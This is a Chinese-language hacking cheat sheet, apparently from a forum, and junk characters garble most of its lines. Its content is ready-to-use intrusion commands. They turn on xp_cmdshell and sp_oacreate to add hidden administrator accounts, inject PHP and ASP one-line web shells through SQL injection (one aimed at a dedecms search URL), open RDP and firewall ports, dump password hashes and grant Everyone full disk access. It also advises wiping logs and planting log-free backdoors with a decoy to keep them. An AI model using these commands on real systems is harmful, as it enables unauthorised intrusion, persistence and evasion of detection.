0 F+ F( E& B- D1.net user administrator /passwordreq:no' E3 S* E- W+ S1 i
这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了" d7 N6 B/ c+ Y
2.比较巧妙的建克隆号的步骤3 ^: n/ z) }+ W& W! J
先建一个user的用户
) G' `( [( C6 x7 R6 H然后导出注册表。然后在计算机管理里删掉) x/ u V/ G+ A* k* W0 W0 E. r
在导入,在添加为管理员组
; C9 _1 Q# F( b3.查radmin密码
7 v1 W" p a0 Ureg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
& ^3 z4 \ B6 |2 m8 |& E( _, z4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
) c2 S* C7 n% N2 Z! c建立一个"services.exe"的项/ ]5 H1 m( F+ e# c
再在其下面建立(字符串值)" a5 E# [& Q" d9 K% `9 m
键值为mu ma的全路径# C5 A \: Y) x& Z9 |
5.runas /user:guest cmd& U- R: ^7 j* J" T, K! g
测试用户权限!1 I3 o8 t+ H4 s: D( C+ H* e
6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?8 P7 I% k5 c% Z' X2 u( [' h
7.入侵后漏洞修补、痕迹清理,后门置放:8 Z/ [$ f# N% y6 Q) j% l
基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门1 U2 N% t |! t7 S) q' i
8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c# U' b! P- b8 ~/ A0 f- ?. H' T9 G
+ q( X& a) i8 m4 \for example
$ G# r* g% A4 S m
4 {/ k6 L& l% J! N3 C6 I3 Xdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
# ? W T- _+ M, V$ r7 \7 ^8 U# Y
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'
$ i/ x( K$ ~9 V. l1 e" s& y* w1 ]- n
9:MSSQL SERVER 2005默认把xpcmdshell 给ON了5 {3 _5 w+ z4 T: R& ~. F+ i
如果要启用的话就必须把他加到高级用户模式& m5 N! n/ c+ |" a% |1 @
可以直接在注入点那里直接注入! C- i, r- d5 j+ b
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
. A. a- l, |2 Q/ L然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--$ A6 A( d7 V0 K! n, d
或者
& C2 I& a' j# k7 t6 `sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'' ?: ]! o' L( d9 {/ d
来恢复cmdshell。6 b: o" k5 Y* I* P# t) S
, P: V, l1 p- V/ v
分析器
5 A4 i$ g- f% q& `EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--2 y0 I7 J% c& q7 ^
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")0 I7 F! _$ R, P1 |/ c
10.xp_cmdshell新的恢复办法
+ @$ Z0 F( A. z( T+ c- fxp_cmdshell新的恢复办法
, o% P$ y' n5 D: s$ v扩展储存过程被删除以后可以有很简单的办法恢复:
O6 X( w% G' Q8 q' h删除6 K3 B$ d8 I( _. a
drop procedure sp_addextendedproc* D# M% p+ N$ a% `; a& Q5 b3 `3 f
drop procedure sp_oacreate
; \ L6 Q" Y% eexec sp_dropextendedproc 'xp_cmdshell'
! R8 Y6 D: N, Y9 Q b" }& D& G0 H# B) S% t& k; I6 D& s
恢复
+ |2 s$ ^' I! E: `dbcc addextendedproc ("sp_oacreate","odsole70.dll")/ f" B+ o8 ^0 U5 {+ e, V/ R
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")+ y* U$ V6 ^8 z( t7 [' p
& @6 X% [- z1 L7 \2 I
这样可以直接恢复,不用去管sp_addextendedproc是不是存在
. V5 ?5 o. V' M+ M- \) R2 V) @
- \5 }4 ]( ^2 I, J( O; k-----------------------------6 c0 Q1 p+ z/ |) m
) T, A- D. P) r+ s删除扩展存储过过程xp_cmdshell的语句:
2 W1 w2 c: `, Z6 i. P2 Fexec sp_dropextendedproc 'xp_cmdshell') }- }1 B' |! ?7 Z$ O' u
% a" j! j) Q3 j3 y& G0 y( U- d恢复cmdshell的sql语句& v5 A- v5 I/ _) s* |
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'- {4 w; X2 o0 O0 l8 }
7 B# v1 A5 g' {' M
5 l5 ^% G; b! M1 h# Q$ W$ d3 @开启cmdshell的sql语句5 R4 ?! J# Z2 r$ t" L3 z; q% k8 J
: ?) q) t0 e) q% ], w
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'0 T. e5 s3 i: t/ R+ x
7 }. H. n8 v( T9 n( P1 z" m
判断存储扩展是否存在
& }4 |0 o8 h& {: [select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'# E6 S5 P1 f3 q# X0 y3 T
返回结果为1就ok* i$ H+ j/ `8 x4 Z
+ u/ U( v7 q7 D6 \$ s# N0 ^: l! i* p恢复xp_cmdshell$ d, ~- {( l5 W* v# y; a
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
2 P" S. O) j$ Y# R返回结果为1就ok
1 C9 s. ~: T; H! a9 l e9 r0 ]0 b( K: R( w, o8 s5 e" Q/ {: R
否则上传xplog7.0.dll- D# B8 v- s( E+ l4 K B
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
7 @! N5 i3 A% m& {: v
. @& A! ~% n+ y; Y堵上cmdshell的sql语句
. f! @, o" e, [' V- O4 q2 fsp_dropextendedproc "xp_cmdshel
' [3 w& H' G1 A8 I% G7 k o-------------------------
0 Y) J" g# R5 k/ d清除3389的登录记录用一条系统自带的命令:
U ~) M, G! O3 y( T% Y# P& B! Ureg delete "hkcu\Software\Microsoft\Terminal Server Client" /f* p1 m( t1 }5 L- d! ~
( p8 ~! H0 c( b% H/ ~# e2 s
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件* \6 p, Q2 {- L( |3 S
在 mysql里查看当前用户的权限, g& j4 U. T$ q5 t, @
show grants for
0 X$ o- R8 E& S) U
; {4 K7 i. L2 z! h" j$ }以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。) ?9 [) q: f, L, k5 y5 f
4 @& t* O" M7 _4 v
6 J3 Q0 ?2 L' Q2 O, L' k2 KCreate USER 'itpro'@'%' IDENTIFIED BY '123';
$ \* D2 s* T& j- W- F2 K: T% J. L5 D3 U! }, \' R
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
) K: ~( f2 [8 A L: i9 n6 ?* H* q& b7 B& Z9 V2 s2 V8 V
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0; {: O" s- q$ |: k' E# \; z9 a
6 n9 I* m. p& \4 ]! ?
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;* L$ B8 u2 h, O0 r1 K
+ L5 F+ ~8 |* j0 E3 M! ~搞完事记得删除脚印哟。
" ~) b$ E' T( r* I7 T* R+ v' D& E/ G( \3 v- o. n# p. J8 i
Drop USER 'itpro'@'%';' @+ D1 L3 R g; ~/ ~, `5 k
{, ` e' Y; vDrop DATABASE IF EXISTS `itpro` ;
: { h& E: u' C$ B3 w; g+ b0 F( H
当前用户获取system权限
2 r) Y3 Z( ` n6 G) U& i/ `sc Create SuperCMD binPath= "cmd /K start" type= own type= interact8 W) S8 n/ A) `+ x/ T! e( d! X5 T3 o
sc start SuperCMD/ ~# L- o1 X' T! a8 I2 w( e
程序代码 f# O; _* h% v- q# ]* A( m2 D$ u k
<SCRIPT LANGUAGE="VBScript">
2 B7 S# G& ^4 R8 m3 {" Q: zset wsnetwork=CreateObject("WSCRIPT.NETWORK")
. g: _6 e% h' o O5 h$ Fos="WinNT://"&wsnetwork.ComputerName
: i* [+ R5 ~- ]+ _* qSet ob=GetObject(os) y: g3 q, v$ l6 R' H
Set oe=GetObject(os&"/Administrators,group")) t1 c- G: X' I) a2 C
Set od=ob.Create("user","nosec")9 b9 x$ G+ |" C" w. m M( c! |
od.SetPassword "123456abc!@#". E1 B+ S ?0 ~' H. c
od.SetInfo
5 b7 ?, |. }+ QSet of=GetObject(os&"/nosec",user)- J* m" t0 q* c; M( F% B
oe.add os&"/nosec"
/ ]2 \& ^" ]+ ~</Script>0 g3 q5 n/ s8 {
<script language=javascript>window.close();</script>; y( H- K6 C' a6 F
& X) h. e# s' ` \) x, ]9 G, {# f% i) I; s
: Z M+ } H0 a, L. C$ y
5 @( R$ f; @' v2 K5 s! L# j突破验证码限制入后台拿shell9 S# z2 Z4 @* _% }' I5 F3 @
程序代码
9 j; g9 t ~6 |8 a: ]$ kREGEDIT4 * U6 w; I5 T3 w8 c! q& @4 @
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
" Q `( M' b( L# c! d, J. W- |& S"BlockXBM"=dword:000000002 x) P" A1 P. V% p8 D% a
" m' |7 K( B1 M: k4 b1 | a( @
保存为code.reg,导入注册表,重器IE6 |) s: ~, c1 u5 U4 C
就可以了- L" ` ~7 L; p7 E7 u* h
union写马) n0 W ?4 o2 Y" T: [
程序代码/ I0 ~) X6 `1 A5 B9 ~; z
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*
( u* ^$ f: g& U& ]4 p8 t
3 p F7 p7 ^& |" @9 M5 Y应用在dedecms注射漏洞上,无后台写马: S8 A) ^6 y2 }2 y
dedecms后台,无文件管理器,没有outfile权限的时候2 F8 ?! `+ S" p4 c/ j
在插件管理-病毒扫描里; v4 u' S- Y7 l7 N
写一句话进include/config_hand.php里+ H: X9 Y' X' E0 k0 W% Z
程序代码+ M, ~6 D' N2 N; U
>';?><?php @eval($_POST[cmd]);?>; D% U! y+ ?5 E- a& P0 M7 G
2 F: u; ~$ E) U' d
- a! C u [( K
如上格式
. [! {$ J! u7 G: K( ]5 r4 [0 S1 l: U/ K, \2 o/ k
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
% _& `+ G6 t8 h4 a4 m程序代码
* D- Z% t" t& [select username,password from dba_users;0 z/ l" u/ m5 J. P5 v0 o
0 L7 @4 e, r1 k0 G" _! F. K3 _3 j% F' W
mysql远程连接用户
$ d# k. b2 H4 I/ |9 b& M; l9 ]9 O程序代码0 N$ R8 x3 U5 P+ U
+ Z' O4 p! N' u1 m+ f. B5 K) wCreate USER 'nosec'@'%' IDENTIFIED BY 'fuckme';2 o2 C2 d! \9 k- F7 x* A
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
2 L& ]$ r! w# X. BMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 04 L( V8 X7 d. s! V$ N
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;" u9 P. F4 L+ P+ B' @/ D
2 z) W3 E6 p. Y/ t! D+ B# s, f- t+ C, U- }/ F9 ?
$ W, I$ E* w1 g6 n# K
4 s" l. p5 Z- j: V a# [
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0+ l; }$ ^# x/ P6 i& R( l+ Z
7 T( X. u* ]: U! Z3 |1.查询终端端口- U( i, ~; C6 g* D6 w
" Q1 x0 ?' {! T. r3 nxp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber% k/ X% K) b; u3 v/ S; y
& U4 _ w! u: t ]% J- B通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"6 Y1 X6 l/ n7 \+ {1 y
type tsp.reg% ^* @1 W% V8 e+ ~3 X
2 K# C8 A& i# f% m8 G
2.开启XP&2003终端服务4 N5 l+ m) i3 D8 m) h E& ?
( z" B- A1 U- e
( m {/ l5 o6 E1 }REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
- v# F. n* s6 U2 d& b
+ w) \ |* Y) c8 Y: n" P# U) f( a& h* B
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f' a5 s3 m3 j6 W
( e8 r5 f0 [! k- W d3.更改终端端口为20008(0x4E28)
/ F J, n- i8 `! C. j' `2 |5 ~
# `6 \& J8 }. o( c: MREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f/ H! e1 ?, l- k7 r, c D% @
# W$ `2 g! v: O+ _( ^4 R7 d8 g8 @3 j8 ?REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f$ A5 N3 q" U: i4 V* U; i3 L/ V
E; e4 ]* d& P* E" A; K* c4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
- H) s D) n: G5 {/ n+ V, w" ~
* m* s1 l- G, ]REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f' k9 g* {$ u+ W) |* J
$ C2 h8 E! A: g2 u1 W) Z& ~) ~6 S7 f9 g) d/ M
5.开启Win2000的终端,端口为3389(需重启)
8 J4 T* O( z# q6 C
; G9 a8 d) f3 X2 q: a+ d [6 kecho Windows Registry Editor Version 5.00 >2000.reg
7 x9 R: `# p& U; ~& f5 A" Fecho. >>2000.reg
( f8 D) D# k; V& h* h+ @echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
1 [" F! f& C* n( Y9 Uecho "Enabled"="0" >>2000.reg 6 P1 i' G3 M4 T2 u% F/ n
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg 3 @# Q- Z* v/ E! S6 u7 c
echo "ShutdownWithoutLogon"="0" >>2000.reg , ? Z& N) C7 v) @: r5 f4 X
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg 5 g) p( \/ B8 \/ c$ X
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg ' `7 h2 z$ ?0 |
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg , S7 b& r8 J+ P- c
echo "TSEnabled"=dword:00000001 >>2000.reg 6 p0 K4 P5 c8 T. Y2 y9 P
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
" m' I6 q+ q3 @/ techo "Start"=dword:00000002 >>2000.reg ) A S, ~' ~3 ~/ R+ Z
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg " E* m* s4 M7 X" y, W3 ?" m
echo "Start"=dword:00000002 >>2000.reg
2 e' f3 u" }- eecho [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
: B3 i0 b" T! l e% iecho "Hotkey"="1" >>2000.reg
% X) X S+ v0 o& K' S: aecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
4 O8 a. R4 ]1 N( F: U5 ~9 gecho "ortNumber"=dword:00000D3D >>2000.reg 9 q+ X. r7 V: Z. z3 g6 C1 D
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg # `# F' G9 N$ J. O, t' ]5 z
echo "ortNumber"=dword:00000D3D >>2000.reg- z( |+ U9 e/ |1 }4 r1 C# f P+ @' j
/ b( j& Z/ _- O( B6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
d2 p2 r2 i+ E; v! f' C: p6 W& f+ A: P- e
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf) C l1 p- r4 |4 f5 b% I1 u
(set inf=InstallHinfSection DefaultInstall). x! D9 s. l9 j' V0 x: D
echo signature=$chicago$ >> restart.inf0 t2 U: V; k! E$ E* v
echo [defaultinstall] >> restart.inf
4 @& e# ^4 J2 crundll32 setupapi,%inf% 1 %temp%\restart.inf
8 d4 E! O" Q+ @( U0 Q- i8 X% S5 V7 ^. h M5 ^7 M7 S6 z
) B4 t# d7 O4 S E
7.禁用TCP/IP端口筛选 (需重启)9 u+ n% u+ j1 ^' d4 ^( M1 G& w
+ G$ s, f! y7 M% s
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
4 v6 M# ~4 c9 Z6 n1 k$ T$ B0 v. _: P! D9 G1 q* n3 g
8.终端超出最大连接数时可用下面的命令来连接4 N& P& p& p. i, q4 M, o
9 K' J. B9 \8 z- p: C
mstsc /v:ip:3389 /console) _, f. @3 q! i r, z* H1 A0 `
4 D. o. m; h8 d; J7 P9.调整NTFS分区权限
5 s$ B' N4 g" q! m7 b: R3 D' Y
6 W/ l0 ?7 k4 Y6 ]* wcacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
. d1 E* _4 T' }0 t
3 K4 k% m% Z3 D/ i4 wcacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)
$ P1 X6 E. K3 K
: S" B2 e9 Z. X; F8 h* K------------------------------------------------------9 l: D; G3 N; \7 J, H! |8 x' |" F
3389.vbs
+ z0 T: s6 H+ W) i, G5 V/ ?On Error Resume Next# M: d! n; g4 k) r$ j
const HKEY_LOCAL_MACHINE = &H80000002
# y5 W2 c+ T, j% e* BstrComputer = "."0 ^; {- l: k X0 E+ C
Set StdOut = WScript.StdOut
! e! R2 A0 c/ q/ i5 D- bSet oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
0 Z ~" s' _( I4 P3 hstrComputer & "\root\default:StdRegProv"); t1 @& y. y- k2 w5 r+ G: j' {
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
& M9 j) q# s* C9 x ~! @4 Z5 @+ Loreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath) R* Z9 k L. y5 x
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
% E8 q; h8 x; B' x8 l# ~4 L7 coreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath& k# |0 d0 i. b
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
0 j6 q d4 ^0 m5 c9 Q% e5 x" q, zstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"; B0 v, r5 v+ U) @- I
strValueName = "fDenyTSConnections"
2 w) w3 S) q! ?8 xdwValue = 0
5 K7 z. o6 \( D0 S& {. K, `6 roreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue! H8 E( v6 y+ Z# G
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"' I$ f9 [0 _; L- \0 {
strValueName = "ortNumber"' M6 H2 p' q) U! ?% w* p
dwValue = 3389
( n9 o7 y" G( X R( Soreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue7 ~& J( [) p5 K, W2 k L
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"0 Z% D5 D6 S7 b& M
strValueName = "ortNumber"
, }& t1 Z; o( ]+ J' \; m zdwValue = 33892 X; b! K/ D5 K/ s, u! c
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue K9 r9 B9 Z) j9 `& e6 l& \
Set R = CreateObject("WScript.Shell") 4 i" l# [/ c6 a+ I
R.run("Shutdown.exe -f -r -t 0")
. W W" I2 L& F; x {3 Y" a& ^& W2 V- V' t3 A- r7 I5 i
删除awgina.dll的注册表键值( s5 w. Y0 p) q% Q6 Y
程序代码
$ M4 A1 |9 `! @; [: ^6 d
( U/ A! O! m' g- Yreg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f1 }* |0 \' z$ }2 e [, I
- C* W/ n4 ^ r
/ P5 q7 T; G( |2 x% N+ D, z3 F* Y- ?/ f" X8 Z
, p8 N6 M) f) B9 ]- b- d, h% Y程序代码8 K) o, C0 r+ S
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
% y( B) p4 b2 n, M9 @# r/ b ]# G4 g* z) j; H
设置为1,关闭LM Hash
& h$ y2 @9 _" D# K& a) M: L
( j3 `+ D4 i+ }+ h/ z( X8 O3 {数据库安全:入侵Oracle数据库常用操作命令4 ^* C4 X" A: D& V+ P" D# `
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。
+ X8 H; {; _* {1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。) x s- X7 y- X r" E( H
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;
# A v& @6 ` N. b+ B7 b3、SQL>connect / as sysdba ;(as sysoper)或$ T6 g7 R# G4 |$ ]- C. {
connect internal/oracle AS SYSDBA ;(scott/tiger)
7 V9 ?6 i: x6 e3 Vconn sys/change_on_install as sysdba;4 W/ _: K# B1 y+ w. n! O
4、SQL>startup; 启动数据库实例1 v7 Y9 {- T5 A) L) O3 L9 q9 n6 a* q
5、查看当前的所有数据库: select * from v$database;: f B% ~/ K$ k
select name from v$database;) d/ [, K% @8 t) ~1 \7 h& E
6、desc v$databases; 查看数据库结构字段
: [" Y7 s* u; }* o* ~/ \7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:' q, {2 D& V: [# y3 J! P- i) f
SQL>select * from V_$PWFILE_USERS;7 W" C; ]0 _# H
Show user;查看当前数据库连接用户5 p V, m. x3 `1 J' _, S
8、进入test数据库:database test;' _; |' z x6 D- v: ?/ v+ X8 F6 b
9、查看所有的数据库实例:select * from v$instance;; S! \" P" k1 z3 M m" J8 u! [+ ^1 G
如:ora9i8 z2 K* u# [" Y V$ \! O* U
10、查看当前库的所有数据表:
+ T( ^0 E6 e" E# |0 \0 c+ [: r! ESQL> select TABLE_NAME from all_tables;
/ u1 o+ f+ E0 u& cselect * from all_tables;$ ^8 d1 `" G" I5 W
SQL> select table_name from all_tables where table_name like '%u%';- v9 }/ t' U) i0 c: J- A: q
TABLE_NAME3 O6 E; R' g# @8 i' ^3 a, J. x
------------------------------
+ D: S3 a/ ~1 a0 Q. t' d_default_auditing_options_! e# d7 e/ ^* I% \( F; ^/ n# R( F* X+ N
11、查看表结构:desc all_tables;
( S# o5 t! ]8 F12、显示CQI.T_BBS_XUSER的所有字段结构:
' P2 Z: g* V. Z% f6 s, ]' Kdesc CQI.T_BBS_XUSER;
4 ?# o/ S3 j' A9 j- v' p+ s1 M13、获得CQI.T_BBS_XUSER表中的记录:: d* g8 d1 H( _* e, n
select * from CQI.T_BBS_XUSER;
5 k j9 g3 N# f9 h14、增加数据库用户:(test11/test)* L: S5 B z5 p! T& f% I9 D) o* u
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;9 J+ H5 M; }* C9 E" y7 k0 Y/ Q+ b
15、用户授权:
0 W' X- K/ i$ {( Ogrant connect,resource,dba to test11;; \$ [2 a7 H0 b; s0 d# D
grant sysdba to test11;
% b- i$ A5 Y# n( bcommit;
P2 z- F1 V% k16、更改数据库用户的密码:(将sys与system的密码改为test.)6 c1 _( r$ W8 l5 {5 d( `$ T# z* v( E- b
alter user sys indentified by test; {( B, `6 `1 G3 ]8 N( |
alter user system indentified by test;8 u- m$ |. p9 W( n# e& C
2 ] J! H# x5 x8 V* iapplicationContext-util.xml u! U9 }/ x* M( y8 x8 E E) Q
applicationContext.xml
6 L& e2 ^/ G$ T" U* [( Rstruts-config.xml! Y! D# N# v- C4 R
web.xml
# R2 G1 N4 F% w) I2 u, yserver.xml
1 B- ]1 b$ }. _% H; ]' e) J, _tomcat-users.xml
# Z/ {; o# n+ s2 m/ Lhibernate.cfg.xml
, M9 p9 H6 N6 A8 @' Gdatabase_pool_config.xml. h3 V/ l. ?! P" m) l6 P6 @
) l! `( c1 c; g3 D- u# p* y3 H7 i5 {/ ]
\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置
( s! x2 k* z5 V' G! |\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini4 w: o" ]( J' w0 q
\WEB-INF\struts-config.xml 文件目录结构
, B" a5 Z8 f5 Q- C
& c5 D, i9 ]0 L" K3 {spring.properties 里边包含hibernate.cfg.xml的名称9 C% o& h' [* S- j$ r
1 s5 o1 Z2 [; G4 H2 _0 ^7 J! W& w/ o# w8 W
C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml1 m. x1 s. x8 w9 a9 W
8 ~0 v4 i# F" u* X; N* J
如果都找不到 那就看看class文件吧。。, y: x. ` u; G
# V3 j3 i; O7 A0 N" {
测试1:
, @0 L7 o4 }( W. B8 f uSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t16 K+ ?4 k d: Q! R4 {
, J& O; ~ A5 w$ S7 z" V
测试2:1 E7 F9 x6 H5 V4 i1 N4 }- \3 D/ k
! v$ g W$ V) t: n
create table dirs(paths varchar(100),paths1 varchar(100), id int): I% r3 u: Y, @' Z2 R
" s; `: g, P4 p+ U; idelete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
, Z" v7 ]& }- ~1 H
" f$ A- M' W; T" wSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t18 d0 a* `9 `, u$ C
6 ^6 {9 z0 J; I: Y$ `$ L
查看虚拟机中的共享文件:3 y k' n/ @9 s* w& c$ N
在虚拟机中的cmd中执行
( O9 b/ `0 d4 B2 c- Z) f' o0 T\\.host\Shared Folders6 I( }& }6 F; R' Q$ r; A
' ~! E/ m# j; Wcmdshell下找终端的技巧7 K Y/ V1 T( A' ~& Y6 p$ G
找终端: ' @5 l4 T. I# V6 e) B
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值!
* D5 a; A* M X 而终端所对应的服务名为:TermService
. u4 x7 U- B# f1 i6 X0 G$ K第二步:用netstat -ano命令,列出所有端口对应的PID值!
+ R# I0 A1 Y7 U% S 找到PID值所对应的端口
1 t0 t9 }" w, z2 w* H4 V I; j. L; K' J X
查询sql server 2005中的密码hash
) z0 N. R; z# y- F' e5 OSELECT password_hash FROM sys.sql_logins where name='sa'% a* N; K9 S- K) @# P; w& P
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
4 h0 I( W: ?) {3 o1 L) Q0 k( Kaccess中导出shell% V: u' }: C# a7 o
( r3 D: ~) K. Z4 f; k% o! c" m9 p1 o中文版本操作系统中针对mysql添加用户完整代码:
% a: B0 y, p3 ]- m3 p
# E! M$ }# M- s: Uuse test;/ Q& m% f$ A6 H8 Q; Z% m2 A9 d, b
create table a (cmd text);8 l8 Z" E4 ~& z+ ~0 h% y& v
insert into a values ("set wshshell=createobject (""wscript.shell"") " );( I7 h5 ^$ M1 I4 ^3 J H
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
